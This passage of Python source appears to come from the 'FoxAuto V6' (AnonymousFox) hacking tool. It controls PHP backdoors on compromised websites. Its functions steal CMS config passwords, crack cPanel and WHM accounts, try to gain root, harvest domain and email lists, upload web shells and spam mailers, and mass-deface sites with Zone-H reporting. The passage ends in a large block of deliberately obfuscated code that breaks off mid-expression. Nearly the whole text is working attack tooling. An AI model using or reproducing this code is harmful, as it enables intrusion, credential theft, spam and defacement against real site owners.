print(' {}[-] Failed.'.format(fr))
return False
def getConfigCFS(backdor, shell):
try :
sh_path = shellPath_Fox(backdor, 'Fox-CCFS/', 1)
post = {'configCFS': 'AnonymousFox'}
print(' {}[*] Trying get config{}CFS{} ..... {}(Waiting)'.format(fw, fg, fw, fr))
try :
getConfig = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=500)
except :
getConfig = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=500)
try :
checkConfig = requests.get(sh_path, headers=headers, timeout=120)
except :
checkConfig = requests.get(sh_path, headers=headers, timeout=150)
checkConfig = content_Fox(checkConfig)
if ('Index of' in checkConfig) :
print(' {}[+] Config => {}{}'.format(fg, fr, sh_path))
print(' {}[*] Trying Check Scripts ..... {}(Waiting)'.format(fw, fr))
getscript_str = str(getscript(backdor, sh_path,shell))
if (getscript_str == 'Problem101') :
print(' {}[-] Please , Check form this manually.'.format(fr))
return False
elif (getscript_str == 'Problem404') :
print(' {}[-] There is no Config.'.format(fr))
return False
else :
print(getscript_str)
return sh_path
else :
print(' {}[-] Failed.'.format(fr))
return False
except :
print(' {}[-] Failed.'.format(fr))
return False
def getscript(backdor, config, shell) :
rz = 'Problem404'
try :
post = {'dir': config, 'getPasswords': 'AnonymousFox'}
try:
getScript = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=500)
except:
getScript = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=500)
getScript = content_Fox(getScript)
if ('Problem101' in getScript):
rz = 'Problem101'
elif ('Problem404' in getScript) :
rz = 'Problem404'
elif ('<password>' in getScript):
if (re.findall(re.compile('<br><wordpress>(.*)</wordpress><br>'), getScript)):
countWP = int(re.findall(re.compile('<br><wordpress>(.*)</wordpress><br>'), getScript)[0])
else :
countWP = 0
if (re.findall(re.compile('<br><joomla>(.*)</joomla><br>'), getScript)):
countJM = int(re.findall(re.compile('<br><joomla>(.*)</joomla><br>'), getScript)[0])
else :
countJM = 0
if (re.findall(re.compile('<br><opencart>(.*)</opencart><br>'), getScript)):
countOC = int(re.findall(re.compile('<br><opencart>(.*)</opencart><br>'), getScript)[0])
else :
countOC = 0
rz = ' {}[+] Found {}{}{} WordPress Config, {}{}{} Joomla Config, {}{}{} OpenCart Config'.format(fg, fr, countWP, fg, fr, countJM, fg, fr, countOC, fg)
open('Results/Configs.txt', 'a').write('Shell => {}\nConfig => {}\n[+] Found {} WordPress Config , {} Joomla Config , {} OpenCart Config\n-----------------------------------------------------------------------------------------------------\n'.format(shell, config, countWP, countJM, countOC))
else :
rz = 'Problem404'
return rz
except:
return rz
def getscript404(backdor, config, shell) :
rz = ' {}[-] There is no Config.'.format(fr)
try :
post = {'dir': config, 'getPasswords': 'AnonymousFox'}
try:
getScript = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=500)
except:
getScript = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=500)
getScript = content_Fox(getScript)
if ('<password>' in getScript):
if (re.findall(re.compile('<br><wordpress>(.*)</wordpress><br>'), getScript)):
countWP = int(re.findall(re.compile('<br><wordpress>(.*)</wordpress><br>'), getScript)[0])
else :
countWP = 0
if (re.findall(re.compile('<br><joomla>(.*)</joomla><br>'), getScript)):
countJM = int(re.findall(re.compile('<br><joomla>(.*)</joomla><br>'), getScript)[0])
else :
countJM = 0
if (re.findall(re.compile('<br><opencart>(.*)</opencart><br>'), getScript)):
countOC = int(re.findall(re.compile('<br><opencart>(.*)</opencart><br>'), getScript)[0])
else :
countOC = 0
rz = ' {}[+] Found {}{}{} WordPress Config, {}{}{} Joomla Config, {}{}{} OpenCart Config'.format(fg, fr, countWP, fg, fr, countJM, fg, fr, countOC, fg)
open('Results/Configs.txt', 'a').write('Shell => {}\nConfig => {}\n[+] Found {} WordPress Config , {} Joomla Config , {} OpenCart Config\n-----------------------------------------------------------------------------------------------------\n'.format(shell, config, countWP, countJM, countOC))
else :
rz = ' {}[-] There is no Config.'.format(fr)
return rz
except:
return rz
def getConfigPasswords_cPanelcracker(backdor, config) :
try:
print(' {}[*] Get Passwords/cPanel-WHM Crack ..... {}(Waiting)'.format(fw, fr))
post = {'dir':config, 'getPasswords':'AnonymousFox'}
post2 = {'getUser': 'AnonymousFox'}
try:
getPassword = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=300)
except:
getPassword = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=360)
getPassword = content_Fox(getPassword)
try :
getUsername = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=15)
except:
getUsername = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=30)
getUsername = content_Fox(getUsername)
if ('<password>' in getPassword) :
if (re.findall(re.compile('<br><password>(.*)</password>'), getPassword)):
passwords = re.findall(re.compile('<br><password>(.*)</password>'),getPassword)
passwordsTXT = ''
if (re.findall(re.compile('<user>(.*)</user>'), getUsername)):
usernames = re.findall(re.compile('<user>(.*)</user>'),getUsername)
usernamesTXT = ''
for password in passwords:
passwordsTXT = passwordsTXT + str(password) + '\n'
for username in usernames:
usernamesTXT = usernamesTXT + str(username) + '\n'
post = {'passwords':passwordsTXT, 'usernames':usernamesTXT, 'crackCP':'AnonymousFox'}
try :
cPanelcracker = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=500)
except:
cPanelcracker = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=1000)
cPanelcracker = content_Fox(cPanelcracker)
if ('<center><font color=blue>You Found 0 cPanel' in cPanelcracker) :
print(' {}[-] Found 0 cPanel.'.format(fr))
else :
n = re.findall(re.compile('<center><font color=blue>You Found (.*) cPanel \(Cracker\)</font></center>'), cPanelcracker)[0]
if (re.findall(re.compile('<center> Host : https://(.*):2083 User : <b><font color=#1eca33>(.*)</font></b><reseller> Password : <b><font color=red>(.*)</reseller></font></b><br/></center>'), cPanelcracker)):
cpanelsRs = re.findall(re.compile('<center> Host : https://(.*):2083 User : <b><font color=#1eca33>(.*)</font></b><reseller> Password : <b><font color=red>(.*)</reseller></font></b><br/></center>'), cPanelcracker)
if (re.findall(re.compile('<center> Host : https://(.*):2083 User : <b><font color=#1eca33>(.*)</font></b> Password : <b><font color=red>(.*)</font></b><br/></center>'), cPanelcracker)):
cpanels = re.findall(re.compile('<center> Host : https://(.*):2083 User : <b><font color=#1eca33>(.*)</font></b> Password : <b><font color=red>(.*)</font></b><br/></center>'),cPanelcracker)
print(' {}[+] Found {} cPanel.'.format(fg, n))
if ('cpanels' in locals()):
for cpanel in cpanels:
cp ='https://'+cpanel[0]+':2083|'+cpanel[1]+'|'+cpanel[2]
if ('amp;' in cp):
cp = cp.replace('amp;', '')
print(' {} - {}{}'.format(fg, fr, cp))
open('Results/cPanelCrack.txt', 'a').write(cp + '\n')
if ('cpanelsRs' in locals()):
for cpanelsR in cpanelsRs:
cp = 'https://' + cpanelsR[0] + ':2083|' + cpanelsR[1] + '|' + cpanelsR[2]
if ('amp;' in cp):
cp = cp.replace('amp;', '')
print(' {} - {}{} [{}Reseller{}]'.format(fr, fg, cp, fr, fg))
open('Results/cPanelCrack.txt', 'a').write(cp + '\n')
cpRs = cp.replace(':2083', ':2087')
open('Results/reseller.txt', 'a').write(cpRs + '\n')
exploitWHM(backdor, cpanelsRs)
else :
print(' {}[-] Please , Check form this manually.'.format(fr))
except:
print(' {}[-] Please , Check form this manually.'.format(fr))
def getRoot(backdor, shell):
try :
post = {'getRoot': 'AnonymousFox'}
post2 = {'checkRoot': 'AnonymousFox'}
print(' {}[*] Trying get Root ..... {}(Waiting)'.format(fw, fr))
try :
getRoot = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=60)
getRoot = content_Fox(getRoot)
except :
getRoot = ''
if ('Error2-Root' in getRoot) :
print(' {}[-] It doesn\'t work with ./dirty.'.format(fr))
return
time.sleep(15)
try :
checkRoot = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=15)
except :
checkRoot = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=15)
checkRoot = content_Fox(checkRoot)
if ('<root>' in checkRoot) :
ip = re.findall(re.compile('<root><ip>IP => (.*)</ip>'), checkRoot)[0]
print(' {}[+] Succeeded.\n - {} IP: {} | PORT: 22 | USERNAME: root | PASSWORD: 0'.format(fg, fr, ip))
print(' {}[!] Note 1: Port 22, It is the default port, If it does not work, Execute: [{}netstat -lnp --ip{}]'.format(fw, fr, fw))
print(' {}[!] Note 2: It is best to wait 5 minutes before trying to log in.'.format(fw))
open('Results/root.txt', 'a').write('{}\n{}|22|root|0\n-----------------------------------------------------------------------------------------------------\n'.format(shell, ip))
else :
print(' {}[-] It didn\'t work with ./dirty.'.format(fr))
except:
print(' {}[-] Failed.'.format(fr))
def getDomains(backdor):
try :
post = {'getDomains': 'AnonymousFox'}
print(' {}[*] Trying get Domains ..... {}(Waiting)'.format(fw, fr))
try :
getDomains = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=30)
except :
getDomains = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=45)
getDomains = content_Fox(getDomains)
if ('<ip>' in getDomains) :
ip = re.findall(re.compile('<ip>(.*)</ip>'), getDomains)[0]
print(' {}[+] Saved in {}Results/Domains_lists/{}.txt'.format(fg, fr, ip))
strrings = ['<ip>{}</ip>'.format(ip), '<head><title>FoxAuto V6</title></head>\n', "FoxAuto V6+<br>Download: anonymousfox.com | <script type='text/javascript'>document.write(unescape('%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'))</script> | anonymousfox.info <br>Telegram: @Anonymous_Fox"]
for s in strrings :
if (s in getDomains):
getDomains = getDomains.replace(s, "")
patheListDomains = r'Results/Domains_lists'
if (not os.path.exists(patheListDomains)):
os.makedirs(patheListDomains)
open('Results/Domains_lists/{}.txt'.format(ip), 'w').write(getDomains)
open('Results/Domains_lists/0.0.0.0.All_Domains.txt', 'a').write(getDomains)
else :
print(' {}[-] Failed.'.format(fr))
except:
print(' {}[-] Failed.'.format(fr))
def getMails(backdor):
try :
post = {'getMails': 'AnonymousFox'}
post2 = {'checkList': 'AnonymousFox'}
print(' {}[*] Trying get Mails ..... {}(Waiting)'.format(fw, fr))
try :
getMails = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=1080)
getMails = content_Fox(getMails)
except :
getMails = getMails = ''
if ('<badconfig>' not in getMails) :
time.sleep(30)
try :
checkList = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=500)
checkList = content_Fox(checkList)
except:
checkList = ''
if ("<domain>" in checkList) :
domain = re.findall(re.compile('<domain>(.*)</domain>'), checkList)[0]
print(' {}[+] Saved in {}Results/Emails_lists/{}_Single.txt'.format(fg, fr, domain))
strrings = ['<domain>{}</domain>'.format(domain), '<head><title>FoxAuto V6</title></head>\n', "FoxAuto V6+<br>Download: anonymousfox.com | <script type='text/javascript'>document.write(unescape('%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'))</script> | anonymousfox.info <br>Telegram: @Anonymous_Fox"]
for s in strrings:
if (s in checkList):
checkList = checkList.replace(s, "")
patheListEmails = r'Results/Emails_lists'
if (not os.path.exists(patheListEmails)) :
os.makedirs(patheListEmails)
open('Results/Emails_lists/{}_Single.txt'.format(domain), 'w').write(checkList)
open('Results/Emails_lists/0.0.0.0.All_Mails.txt', 'a').write(checkList + '\n')
else :
print(' {}[-] There is no Email.'.format(fr))
else :
print(' {}[-] There is no Config.'.format(fr))
except:
print(' {}[-] Failed.'.format(fr))
def MassGetMails(backdor, config):
try :
post = {'dir' : config, 'MassGetMails': 'AnonymousFox'}
post2 = {'checkList': 'AnonymousFox'}
print(' {}[*] Trying get Mails ..... {}(Waiting)'.format(fw, fr))
try :
getMails = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post, headers=headers, timeout=2160)
getMails = content_Fox(getMails)
except :
getMails = ''
if ('<badconfig>' not in getMails) :
time.sleep(60)
try :
checkList = requests.post('{}?php={}/{}v{}/p3.txt'.format(backdor, dom, to, version), data=post2, headers=headers, timeout=500)
checkList = content_Fox(checkList)
except:
checkList = ''
if ("<domain>" in checkList) :
domain = re.findall(re.compile('<domain>(.*)</domain>'), checkList)[0]
print(' {}[+] Saved in {}Results/Emails_lists/{}_Configs.txt'.format(fg, fr, domain))
strrings = ['<domain>{}</domain>'.format(domain), '<head><title>FoxAuto V6</title></head>\n', "FoxAuto V6+<br>Download: anonymousfox.com | <script type='text/javascript'>document.write(unescape('%61%6E%6F%6E%79%6D%6F%75%73%66%6F%78%2E%6E%65%74'))</script> | anonymousfox.info <br>Telegram: @Anonymous_Fox"]
for s in strrings:
if (s in checkList):
checkList = checkList.replace(s, "")
patheListEmails = r'Results/Emails_lists'
if (not os.path.exists(patheListEmails)) :
os.makedirs(patheListEmails)
open('Results/Emails_lists/{}_Configs.txt'.format(domain), 'w').write(checkList)
open('Results/Emails_lists/0.0.0.0.All_Mails.txt', 'a').write(checkList + '\n')
else :
print(' {}[-] There is no Email.'.format(fr))
else :
print(' {}[-] There is no Config.'.format(fr))
except:
print(' {}[-] Failed.'.format(fr))
def uploadMailer(backdor, leafMailer):
try:
print(' {}[*] Upload Leaf PHPMailer ..... {}(Waiting)'.format(fw, fr))
mailer_pass = random_Fox(10)
leafMailer = file_get_contents_Fox(leafMailer)
mailer_text = leafMailer.replace("AnonymousFox", mailer_pass)
filename = random_Fox(10) + '.php'
mailer_path = shellPath_Fox(backdor, filename, 1)
filedata = {'upload': 'upload'}
fileup = {'file': (filename, mailer_text)}
try :
upMailer = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=filedata, files=fileup, headers=headers, timeout=45)
except:
upMailer = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=filedata, files=fileup, headers=headers, timeout=60)
if (upMailer.status_code != 403 and 'WORKING' in testSendA) :
print(' {}[+] Succeeded.\n - {}{}?pass={}'.format(fg, fr, mailer_path, mailer_pass))
open('Results/Leaf_PHP_Mailers.txt', 'a').write('{}?pass={}\n'.format(mailer_path, mailer_pass))
else:
print(' {}[-] Failed.'.format(fr))
except :
print(' {}[-] Failed.'.format(fr))
def uploadFile(backdor, srcShell, tyShell = 1) :
try:
if (tyShell > 5) :
print(' {}[*] Upload File ..... {}(Waiting)'.format(fw, fr))
if (tyShell == 4 or tyShell == 9) :
mailer_pass = random_Fox(10)
srcShell = file_get_contents_Fox(srcShell)
srcShell = srcShell.replace("AnonymousFox", mailer_pass)
else:
srcShell = open(srcShell, 'rb')
filename = random_Fox(10) + '.php'
if (tyShell == 4 or tyShell == 9) :
file_path = shellPath_Fox(backdor, filename, 1) + '?pass={}'.format(mailer_pass)
else :
file_path = shellPath_Fox(backdor, filename, 1)
post = {'upload': 'upload'}
fileup = {'file': (filename, srcShell)}
try :
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), files=fileup, data=post, headers=headers, timeout=30)
except:
upFile = requests.post('{}?php={}/{}v{}/p2.txt'.format(backdor, dom, to, version), files=fileup, data=post, headers=headers, timeout=45)
if (upFile.status_code != 403 and 'FoxAuto' in checkups) :
print(' {}[+] Succeeded Upload.\n - {}{}'.format(fg, fr, file_path))
if (tyShell == 4 or tyShell == 9):
open('Results/Leaf_PHP_Mailers.txt', 'a').write('{}\n'.format(file_path))
else :
print(' {}[+] Saved in {}Results/Shells.txt'.format(fg, fr))
open('Results/Shells.txt', 'a').write('{}\n'.format(file_path))
else:
print(' {}[-] Failed Upload.'.format(fr))
except :
print(' {}[-] Failed Upload.'.format(fr))
def uploadFileMain(backdor, file, tyShell = 1) :
try :
if (tyShell > 5):
print(' {}[*] Upload File ..... {}(Waiting)'.format(fw, fr))
if (tyShell == 4 or tyShell == 9) :
mailer_pass = random_Fox(10)
file = file_get_contents_Fox(file)
file = file.replace("AnonymousFox", mailer_pass)
else:
srcShell = open(file, 'rb')
post = {'up': 'up'}
filename = random_Fox(10) + '.php'
fileup = {'file': (filename, file)}
try :
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), files=fileup, data=post, headers=headers, timeout=45)
except:
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), files=fileup, data=post, headers=headers, timeout=60)
if (upFile.status_code != 403) :
upFile = content_Fox(upFile)
file_path = re.findall(re.compile('<yourfile>(.*)</yourfile>'), upFile)[0]
if (tyShell == 4 or tyShell == 9):
file_path = file_path + '?pass={}'.format(mailer_pass)
if ('https://' in backdor):
file_path = file_path.replace('http://', 'https://')
print(' {}[+] Succeeded.\n - {}{}'.format(fg, fr, file_path))
if (tyShell == 4 or tyShell == 9):
open('Results/Leaf_PHP_Mailers.txt', 'a').write('{}\n'.format(file_path))
else :
print(' {}[+] Saved in {}Results/Shells.txt'.format(fg, fr))
open('Results/Shells.txt', 'a').write('{}\n'.format(file_path))
else:
print(' {}[-] Failed.'.format(fr))
except :
print(' {}[-] Failed.'.format(fr))
def massUploadIndex1(backdor, file, nameF, z, attacker) :
try :
print(' {}[*] Upload Index ..... {}(Waiting)'.format(fw, fr))
post = {'up': 'up'}
fileup = {'file': (nameF, file_get_contents_Fox(file))}
try :
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), files=fileup, data=post, headers=headers, timeout=45)
except:
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), files=fileup, data=post, headers=headers, timeout=60)
if (upFile.status_code != 403) :
upFile = content_Fox(upFile)
file_path = re.findall(re.compile('<yourfile>(.*)</yourfile>'), upFile)[0]
if ('https://' in backdor):
file_path = file_path.replace('http://', 'https://')
print(' {}[+] Succeeded.\n - {}{}'.format(fg, fr, file_path))
open('Results/indexS.txt', 'a').write('{}\n'.format(file_path))
if(z == 1): zoneH(file_path, attacker)
else:
print(' {}[-] Failed.'.format(fr))
except :
print(' {}[-] Failed.'.format(fr))
def massUploadIndex2(backdor, file, z, attacker) :
try :
print(' {}[*] Upload Index ..... {}(Waiting)'.format(fw, fr))
filedata = {'getindex':'AnonymousFox', 'index': file_get_contents_Fox(file)}
try :
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=filedata, headers=headers, timeout=45)
except:
upFile = requests.post('{}?php={}/{}v{}/p1.txt'.format(backdor, dom, to, version), data=filedata, headers=headers, timeout=60)
if (upFile.status_code != 403) :
upFile = content_Fox(upFile)
file_path = re.findall(re.compile('<yourindex>(.*)</yourindex>'), upFile)[0]
if ('https://' in backdor):
file_path = file_path.replace('http://', 'https://')
print(' {}[+] Succeeded.\n - {}{}'.format(fg, fr, file_path))
open('Results/indexS.txt', 'a').write('{}\n'.format(file_path))
if (z == 1): zoneH(file_path, attacker)
else:
print(' {}[-] Failed.'.format(fr))
except :
print(' {}[-] Failed.'.format(fr))
_hlsclcpzwvcu=((()==[])+(()==[]));__aflplkezjikd=(_hlsclcpzwvcu**_hlsclcpzwvcu);___yxzqdtmchnrw=((__aflplkezjikd<<__aflplkezjikd));____fsramejesdme=((__aflplkezjikd<<___yxzqdtmchnrw));_____tajgegigotbw=((__aflplkezjikd<<____fsramejesdme));______mwfdcrswdvcf=((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)));_______ecvjmoevghfv=str("".join(chr(__RSV) for __RSV in [((__aflplkezjikd<<__aflplkezjikd)+(___yxzqdtmchnrw<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(____fsramejesdme<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(_____tajgegigotbw<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+(((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(______mwfdcrswdvcf<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));________ygduyrnxgztb=str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))]));_________cizspthecocr=str("".join(chr(__RSV) for __RSV in [((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),(_____tajgegigotbw+______mwfdcrswdvcf),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(____fsramejesdme+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+____fsramejesdme+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((_hlsclcpzwvcu**_hlsclcpzwvcu)+___yxzqdtmchnrw+_____tajgegigotbw+______mwfdcrswdvcf+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))),(___yxzqdtmchnrw+____fsramejesdme+(((__aflplkezjikd<<___yxzqdtmchnrw))<<(_hlsclcpzwvcu**_hlsclcpzwvcu))+(((((__aflplkezjikd<<____fsramejesdme))<<(_hlsclcpzwvcu**_hlsclcpzwvcu)))<<(_hlsclcpzwvcu**_h